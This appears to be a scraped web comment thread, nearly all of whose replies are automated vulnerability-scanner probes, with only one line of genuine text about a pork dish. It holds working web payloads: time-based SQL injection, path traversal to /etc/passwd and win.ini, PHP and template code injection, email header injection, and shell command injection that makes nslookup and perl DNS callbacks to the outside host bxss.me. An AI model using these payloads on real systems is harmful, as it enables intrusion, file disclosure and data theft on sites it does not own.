/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
re: hambogo
|(nslookup hitrdxuobgkzm6efdb.bxss.me||perl -e "gethostbyname('hitrdxuobgkzm6efdb.bxss.me')")
re: hambogo
";print(md5(31337));$a="
re: hambogo
bxss.me
re: hambogo
file:///etc/passwd
re: hambogo
`(nslookup hitxrqgglebda2f48e.bxss.me||perl -e "gethostbyname('hitxrqgglebda2f48e.bxss.me')")`
re: hambogo
${@print(md5(31337))}
re: hambogo
/\../\../\../\../\../\../\../etc/passwd
re: hambogo
;(nslookup hitdxiwkaellq15ae2.bxss.me||perl -e "gethostbyname('hitdxiwkaellq15ae2.bxss.me')")|(nslookup hitdxiwkaellq15ae2.bxss.me||perl -e "gethostbyname('hitdxiwkaellq15ae2.bxss.me')")&(nslookup hitdxiwkaellq15ae2.bxss.me||perl -e "gethostbyname('hitdxiwkaellq15ae2.bxss.me')")
re: hambogo
${@print(md5(31337))}\
re: hambogo
/WEB-INF/web.xml
re: hambogo
'.print(md5(31337)).'
re: hambogo
C:\WINDOWS\system32\drivers\etc\hosts
re: hambogo
../../../../../../../../../../windows/win.ini%00.jpg
re: hambogo
/../../../../../../../../../../boot.ini
re: hambogo
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: hambogo
..\..\..\..\..\..\..\..\windows\win.ini
re: hambogo
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: hambogo
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: hambogo
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: hambogo
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: hambogo
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: hambogo
WEB-INF/web.xml
re: hambogo
WEB-INF\web.xml
re: hambogo
1
re: hambogo
1
re: hambogo
-1 OR 2+252-252-1=0+0+0+1 --
re: hambogo
-1 OR 3+252-252-1=0+0+0+1 --
re: hambogo
-1 OR 2+633-633-1=0+0+0+1
re: hambogo
-1 OR 3+633-633-1=0+0+0+1
re: hambogo
-1' OR 2+961-961-1=0+0+0+1 --
re: hambogo
-1' OR 3+961-961-1=0+0+0+1 --
re: hambogo
-1' OR 2+637-637-1=0+0+0+1 or 'VLT7rbXq'='
re: hambogo
-1' OR 3+637-637-1=0+0+0+1 or 'VLT7rbXq'='
re: hambogo
-1" OR 2+648-648-1=0+0+0+1 --
re: hambogo
-1" OR 3+648-648-1=0+0+0+1 --
re: hambogo
if(now()=sysdate(),sleep(15),0)
re: hambogo
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: hambogo
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: hambogo
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: hambogo
-1; waitfor delay '0:0:15' --
re: hambogo
-1); waitfor delay '0:0:15' --
re: hambogo
1 waitfor delay '0:0:15' --
re: hambogo
kKJ06Jr1'; waitfor delay '0:0:15' --
re: hambogo
-5 OR 731=(SELECT 731 FROM PG_SLEEP(15))--
re: hambogo
-5) OR 514=(SELECT 514 FROM PG_SLEEP(15))--
re: hambogo
-1)) OR 828=(SELECT 828 FROM PG_SLEEP(15))--
re: hambogo
n9Rf6BVn' OR 215=(SELECT 215 FROM PG_SLEEP(15))--
re: hambogo
HwvbK5ak') OR 81=(SELECT 81 FROM PG_SLEEP(15))--
re: hambogo
wV8ovzWf')) OR 588=(SELECT 588 FROM PG_SLEEP(15))--
re: hambogo
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: hambogo
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: hambogo
'||(select 1 from (select pg_sleep(15))x)||'
re: hambogo
''||(select 1 from (select pg_sleep(15))x)||''
re: hambogo
1'"
re: hambogo
@@NOWmd
Tai Fu pork(伊豆の豚湖豚) I chose for my visit was excellent.
re: Leo Saito
KOe6dxxz
re: Leo Saito
1*
re: Leo Saito
1*
re: Leo Saito
1*
re: Leo Saito
1*
re: Leo Saito
-1 OR 2+601-601-1=0+0+0+1
re: Leo Saito
-1 OR 3+601-601-1=0+0+0+1
re: Leo Saito
if(now()=sysdate(),sleep(15),0)
re: Leo Saito
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Leo Saito
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Leo Saito
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Leo Saito
-1; waitfor delay '0:0:15' --
re: Leo Saito
-1); waitfor delay '0:0:15' --
re: Leo Saito
1 waitfor delay '0:0:15' --
re: Leo Saito
te8DbKSE'; waitfor delay '0:0:15' --
re: Leo Saito
-5 OR 637=(SELECT 637 FROM PG_SLEEP(15))--
re: Leo Saito
-5) OR 137=(SELECT 137 FROM PG_SLEEP(15))--
re: Leo Saito
-1)) OR 290=(SELECT 290 FROM PG_SLEEP(15))--
re: Leo Saito
YTDq2qlS' OR 399=(SELECT 399 FROM PG_SLEEP(15))--
re: Leo Saito
bKM7U8Vz') OR 87=(SELECT 87 FROM PG_SLEEP(15))--
re: Leo Saito
qwcNbctf')) OR 389=(SELECT 389 FROM PG_SLEEP(15))--
re: Leo Saito
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Leo Saito
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Leo Saito
'||(select 1 from (select pg_sleep(15))x)||'
re: Leo Saito
''||(select 1 from (select pg_sleep(15))x)||''
re: Leo Saito
1'"
re: Leo Saito
@@gRIFZ
re: Leo Saito
l5MScj5a
re: Leo Saito
1*
re: Leo Saito
1*
re: Leo Saito
1*
re: Leo Saito
1*
re: Leo Saito
-1 OR 2+118-118-1=0+0+0+1
re: Leo Saito
-1 OR 3+118-118-1=0+0+0+1
re: Leo Saito
if(now()=sysdate(),sleep(15),0)
re: Leo Saito
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Leo Saito
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Leo Saito
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Leo Saito
-1; waitfor delay '0:0:15' --
re: Leo Saito
-1); waitfor delay '0:0:15' --
re: Leo Saito
1 waitfor delay '0:0:15' --
re: Leo Saito
UrPixp55'; waitfor delay '0:0:15' --
re: Leo Saito
-5 OR 90=(SELECT 90 FROM PG_SLEEP(15))--
re: Leo Saito
-5) OR 544=(SELECT 544 FROM PG_SLEEP(15))--
re: Leo Saito
-1)) OR 763=(SELECT 763 FROM PG_SLEEP(15))--
re: Leo Saito
KrwK10NX' OR 88=(SELECT 88 FROM PG_SLEEP(15))--
re: Leo Saito
7JyAk479') OR 851=(SELECT 851 FROM PG_SLEEP(15))--
re: Leo Saito
KoEGbj7U')) OR 944=(SELECT 944 FROM PG_SLEEP(15))--
re: Leo Saito
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Leo Saito
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Leo Saito
'||(select 1 from (select pg_sleep(15))x)||'
re: Leo Saito
''||(select 1 from (select pg_sleep(15))x)||''
re: Leo Saito
1'"
re: Leo Saito
@@htluI
re: Leo Saito
1yoPaXD6O
re: Leo Saito
response.write(9010117*9837382)
re: Leo Saito
%0abcc:074625.67-10065.67.678ba.19990.2@bxss.me
re: Leo Saito
'+response.write(9010117*9837382)+'
re: Leo Saito
<esi:include src="http://bxss.me/rpb.png"/>
re: Leo Saito
to@example.com>%0d%0abcc:074625.67-10066.67.678ba.19990.2@bxss.me
re: Leo Saito
"+response.write(9010117*9837382)+"
re: Leo Saito
${9999170+9999653}
re: Leo Saito
../../../../../../../../../../../../../../etc/passwd
re: Leo Saito
../../../../../../../../../../../../../../windows/win.ini
re: Leo Saito
'.gethostbyname(lc('hitve'.'stdohwfj0b35d.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(108).chr(84).chr(105).chr(73).'
re: Leo Saito
file:///etc/passwd
re: Leo Saito
)
re: Leo Saito
".gethostbyname(lc("hittt"."jyxbhyrg8f38f.bxss.me."))."A".chr(67).chr(hex("58")).chr(105).chr(89).chr(116).chr(84)."
re: Leo Saito
../../../../../../../../../../../../../../../proc/version
re: Leo Saito
!(()&&!|*|*|
re: Leo Saito
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: Leo Saito
^(#$!@#$)(()))******
re: Leo Saito
../../../../../../../../../../etc/passwd%00.jpg
re: Leo Saito
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: Leo Saito
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: Leo Saito
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: Leo Saito
echo hbmhre$()\ upodbg\nz^xyu||a #' &echo hbmhre$()\ upodbg\nz^xyu||a #|" &echo hbmhre$()\ upodbg\nz^xyu||a #
re: Leo Saito
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: Leo Saito
HttP://bxss.me/t/xss.html?%00
re: Leo Saito
/etc/passwd
re: Leo Saito
"+"A".concat(70-3).concat(22*4).concat(113).concat(81).concat(108).concat(77)+(require"socket"
Socket.gethostbyname("hitrc"+"rmjfkgsq44a5b.bxss.me.")[3].to_s)+"
re: Leo Saito
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: Leo Saito
&echo qgtmho$()\ urzikf\nz^xyu||a #' &echo qgtmho$()\ urzikf\nz^xyu||a #|" &echo qgtmho$()\ urzikf\nz^xyu||a #
re: Leo Saito
bxss.me/t/xss.html?%00
re: Leo Saito
%2fetc%2fpasswd
re: Leo Saito
'+'A'.concat(70-3).concat(22*4).concat(104).concat(73).concat(115).concat(71)+(require'socket'
Socket.gethostbyname('hitkd'+'rwgrvkdwb5fbe.bxss.me.')[3].to_s)+'
re: Leo Saito
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: Leo Saito
|echo pqtzdq$()\ gzropm\nz^xyu||a #' |echo pqtzdq$()\ gzropm\nz^xyu||a #|" |echo pqtzdq$()\ gzropm\nz^xyu||a #
re: Leo Saito
/.././.././.././.././.././.././.././../etc/./passwd%00
re: Leo Saito
Http://bxss.me/t/fit.txt
re: Leo Saito
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: Leo Saito
(nslookup hitndurrqrwzm84e57.bxss.me||perl -e "gethostbyname('hitndurrqrwzm84e57.bxss.me')")
re: Leo Saito
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
re: Leo Saito
http://bxss.me/t/fit.txt%3F.jpg
re: Leo Saito
';print(md5(31337));$a='
re: Leo Saito
$(nslookup hitbxayqijyuc60780.bxss.me||perl -e "gethostbyname('hitbxayqijyuc60780.bxss.me')")
re: Leo Saito
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: Leo Saito
'"
re: Leo Saito
/etc/shells
re: Leo Saito
";print(md5(31337));$a="
re: Leo Saito
&nslookup hitmhihaitjgn89447.bxss.me&'\"`0&nslookup hitmhihaitjgn89447.bxss.me&`'
re: Leo Saito
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: Leo Saito
<!--
re: Leo Saito
c:/windows/win.ini
re: Leo Saito
${@print(md5(31337))}
re: Leo Saito
&(nslookup hittbisgmvftka1bcd.bxss.me||perl -e "gethostbyname('hittbisgmvftka1bcd.bxss.me')")&'\"`0&(nslookup hittbisgmvftka1bcd.bxss.me||perl -e "gethostbyname('hittbisgmvftka1bcd.bxss.me')")&`'
re: Leo Saito
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: Leo Saito
${@print(md5(31337))}\
re: Leo Saito
bxss.me
re: Leo Saito
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
re: Leo Saito
|(nslookup hitsqhycuysyga7f77.bxss.me||perl -e "gethostbyname('hitsqhycuysyga7f77.bxss.me')")
re: Leo Saito
'.print(md5(31337)).'
re: Leo Saito
file:///etc/passwd
re: Leo Saito
`(nslookup hitgdavkmymxfa04cb.bxss.me||perl -e "gethostbyname('hitgdavkmymxfa04cb.bxss.me')")`
re: Leo Saito
/\../\../\../\../\../\../\../etc/passwd
re: Leo Saito
;(nslookup hitaknizfjmpf339ae.bxss.me||perl -e "gethostbyname('hitaknizfjmpf339ae.bxss.me')")|(nslookup hitaknizfjmpf339ae.bxss.me||perl -e "gethostbyname('hitaknizfjmpf339ae.bxss.me')")&(nslookup hitaknizfjmpf339ae.bxss.me||perl -e "gethostbyname('hitaknizfjmpf339ae.bxss.me')")
re: Leo Saito
/WEB-INF/web.xml
re: Leo Saito
C:\WINDOWS\system32\drivers\etc\hosts
re: Leo Saito
../../../../../../../../../../windows/win.ini%00.jpg
re: Leo Saito
/../../../../../../../../../../boot.ini
re: Leo Saito
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: Leo Saito
..\..\..\..\..\..\..\..\windows\win.ini
re: Leo Saito
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: Leo Saito
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: Leo Saito
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: Leo Saito
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: Leo Saito
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\